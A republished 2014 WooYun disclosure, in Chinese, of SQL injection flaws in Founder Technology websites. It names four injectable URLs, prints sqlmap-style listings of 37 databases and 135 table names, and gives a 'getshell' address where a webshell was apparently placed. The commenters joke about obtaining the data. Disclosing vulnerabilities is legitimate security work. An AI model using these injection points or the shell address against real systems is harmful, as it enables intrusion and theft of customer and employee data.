方正科技集团存在多个SQL注入漏洞可影响海量用户数据

admin

139803
文章

114
评论

2015年7月3日10:16:25评论359 views字数 223阅读0分44秒阅读模式

摘要

2014-10-09：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-11-23：厂商已经主动忽略漏洞，细节向公众公开

漏洞概要关注数(6) 关注此漏洞

缺陷编号： WooYun-2014-78760

漏洞标题：方正科技集团存在多个SQL注入漏洞可影响海量用户数据

漏洞作者：路人甲

提交时间： 2014-10-09 16:15

公开时间： 2014-11-23 16:16

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

2014-10-09：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-11-23：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

某大型高科技股份集团多个SQL注入合集，百万数据告急

详细说明：

可跨库，沦陷30多个数据库，泄露数据数百万（内部员工信息，客户信息），疑似被挂马

方正科技集团股份有限公司（简称“方正科技”），是北大方正信息产业集团旗下的内地上市企业

（SH.600601），也是国内最有影响力的高科技上市企业之一

漏洞证明：

注入点：

code 区域

http://card.foundertech.com/live/driver/Scanner_Name.aspx?name=F300%2fF400%2fF500
 
 http://card.foundertech.com/live/driver/Printer_Name.aspx?name=1000C
 
 http://card.foundertech.com/live/driver/Service_Name.aspx?name=LR200+1100
 
 http://card.foundertech.com/live/driver/Home_Name.aspx?name=%b7%c9%d4%bdA600

available databases [37]:

[*] AdventureWorks

[*] AdventureWorksDW

[*] CM31

[*] CRMeasy

[*] CRMEasy_His

[*] CRMeasy_TEST

[*] CRMEasy_WebChat

[*] CusData

[*] DatabaseiCRMCore1

[*] FC

[*] FindCustomer

[*] FounderShop

[*] Foundertech

[*] GuangDa

[*] GuoTu

[*] Info

[*] Info23

[*] JinSheng

[*] Kbar

[*] Knowledge

[*] LegaPro

[*] master

[*] model

[*] msdb

[*] OkiKnowledge

[*] Peier

[*] Pfizer

[*] Project

[*] Service

[*] Space_Acer

[*] Space_Data

[*] Space_Gome

[*] Space_HongSan

[*] Space_PKURG

[*] Space_Web

[*] tempdb

[*] Web

code 区域

Database: Foundertech
 [135 tables]
 +---------------------------+
 | 7788                      |
 | Apabi                     |
 | Article                   |
 | AutoDrv                   |
 | CONTENTMENT               |
 | China                     |
 | Club                      |
 | ClubCCL                   |
 | ClubCCL2                  |
 | ClubCCL_Record            |
 | ClubETime                 |
 | ClubETime2                |
 | ClubFestival              |
 | ClubGift                  |
 | ClubGiftApply             |
 | ClubGoods                 |
 | ClubGoodsApply            |
 | ClubGoodsDelivery         |
 | ClubGoodsDelivery_bak     |
 | ClubGoodsOrder            |
 | ClubLife                  |
 | ClubMac                   |
 | ClubMagzine               |
 | ClubMyPic                 |
 | ClubPPT                   |
 | ClubPPT_Mark              |
 | ClubPPT_Point             |
 | ClubParm                  |
 | ClubPay                   |
 | ClubPayDis                |
 | ClubPayOrder              |
 | ClubPay_20070914          |
 | ClubPhoto                 |
 | ClubPoint                 |
 | ClubPriority              |
 | ClubSN                    |
 | ClubSPHY                  |
 | ClubUpgrade               |
 | ClubUser                  |
 | ClubUser_20070828         |
 | ClubUser_20070914         |
 | ClubVip                   |
 | Cus_Msg                   |
 | D99_CMD                   |
 | D99_REG                   |
 | D99_Tmp                   |
 | DYB                       |
 | DYB_20090901_BAK          |
 | DYB_20090929_BAK          |
 | DYB_2010010401_BAK        |
 | DYB_20100104_BAK          |
 | DYB_20100504_BAK          |
 | Diagnose                  |
 | Driver_Acer               |
 | Driver_Business           |
 | Driver_Business_BAK_MA0   |
 | Driver_Digital            |
 | Driver_Digital_GPS        |
 | Driver_Home               |
 | Driver_Home_BAK_MA0       |
 | Driver_Home_BAK_OldModel  |
 | Driver_Network            |
 | Driver_NoteBook_Pl        |
 | Driver_Notebook           |
 | Driver_PC_Wl              |
 | Driver_Part               |
 | Driver_Printer            |
 | Driver_Record             |
 | Driver_SN_Record          |
 | Driver_SN_Record2         |
 | Driver_Scanner            |
 | Driver_Service            |
 | Drv                       |
 | Drv2                      |
 | Drv_Plus                  |
 | EMS                       |
 | FTWEB_So                  |
 | FzMSN                     |
 | Goods                     |
 | Guarantee                 |
 | HelpNow                   |
 | HelpNowOrder              |
 | HelpNow_Try               |
 | Khxw_Award                |
 | Khxw_Lotto                |
 | Khxw_Lotto2               |
 | Khxw_Qu                   |
 | Khxw_Qu2                  |
 | Khxw_info                 |
 | Khxw_info2                |
 | Manual                    |
 | News                      |
 | Pages                     |
 | Pages_Detail              |
 | Register                  |
 | RepairSite                |
 | RepairSiteVirtual         |
 | RepairSiteVirtualBak      |
 | RepairSiteVirtualBak2     |
 | RepairSiteVirtualBak3     |
 | RepairSiteVirtual_GuangXi |
 | SN2Drv                    |
 | SN2Drv1210                |
 | SN2Drv2                   |
 | SN2Drv3                   |
 | SN2Drv4                   |
 | ServiceCard               |
 | ServiceCardLib            |
 | ServiceCardReg            |
 | ServiceCard_Info          |
 | ServiceCard_Market        |
 | ServiceCounter            |
 | Sheet                     |
 | Software                  |
 | Station                   |
 | Station2                  |
 | Station3                  |
 | StationNew                |
 | Station_Bak201310         |
 | Survey                    |
 | Tips                      |
 | VIP                       |
 | VipService                |
 | Virus                     |
 | Vista                     |
 | Vista2                    |
 | VistaUpgrade              |
 | c_info                    |
 | dst2q                     |
 | dyb_2010_07_01_bak        |
 | dyb_bak_20100601          |
 | dyb_temp                  |
 | dybupdate_0930            |
 | gt                        |
 | tempp                     |
 +---------------------------+

getshell地址：

code 区域

http://www.foundertech.com/ms.aspx

修复方案：

紧急修复

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：10 (WooYun评价)

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):

登陆后才能进行评分

100%

评价

2014-11-23 16:29 | ddy ( 实习白帽子 | Rank:45 漏洞数:17 | 其实第一次要我挖洞我是拒绝的。因为，你不...)

1

未能联系到厂商或者厂商积极拒绝

1# 回复此人
2014-11-23 16:30 | 小学猹 ( 实习白帽子 | Rank:81 漏洞数:30 | 暮春者，春服既成，冠者五六人，童子六七人...)

1

= =SA权限我只能求裤子了

2# 回复此人
2014-11-23 18:14 | F0rm ( 路人 | Rank:0 漏洞数:2 | )

1

sqlmap怎么显示中文的啊

3# 回复此人

方正科技集团存在多个SQL注入漏洞可影响海量用户数据

漏洞概要关注数(6) 关注此漏洞

缺陷编号： WooYun-2014-78760

漏洞标题：方正科技集团存在多个SQL注入漏洞可影响海量用户数据

相关厂商：方正科技集团股份有限公司

漏洞作者：路人甲

提交时间： 2014-10-09 16:15

公开时间： 2014-11-23 16:16

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(少于3人评价):

登陆后才能进行评分

评价

WooYun.org-优酷多个分站存在SSRF漏洞大礼包

WooYun.org-优特捷某内部邮箱账户外泄涉及大量敏感信息(多家合作单位躺枪)

WooYun.org-某网平行权限漏洞（影响所有使用用户）

Bypass分享 | 形而上学，不行退学的一句话

格兰仕千万数据库信息泄露

3399游戏源码下载

WEFANS喂饭后台弱口令

国家电网某充电APP系统Getshell涉及大量用户敏感信息

威锋网游戏站存在SQL注入（含多重绕过+编码）

APP安全之三维度从一个毫无用处的xss到获取大量身份证信息图片(包括李刚身份证)

发表评论

在线咨询

微信

漏洞概要 关注数(6) 关注此漏洞

缺陷编号： WooYun-2014-78760

漏洞标题： 方正科技集团存在多个SQL注入漏洞可影响海量用户数据

相关厂商： 方正科技集团股份有限公司

漏洞作者： 路人甲

提交时间： 2014-10-09 16:15

公开时间： 2014-11-23 16:16

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 未联系到厂商或者厂商积极忽略

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞评价：

漏洞评价(少于3人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(6) 关注此漏洞

漏洞标题：方正科技集团存在多个SQL注入漏洞可影响海量用户数据

相关厂商：方正科技集团股份有限公司

漏洞作者：路人甲

危害等级：高

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签：无

版权声明：转载请注明来源路人甲@乌云

漏洞评价(少于3人评价):

登陆后才能进行评分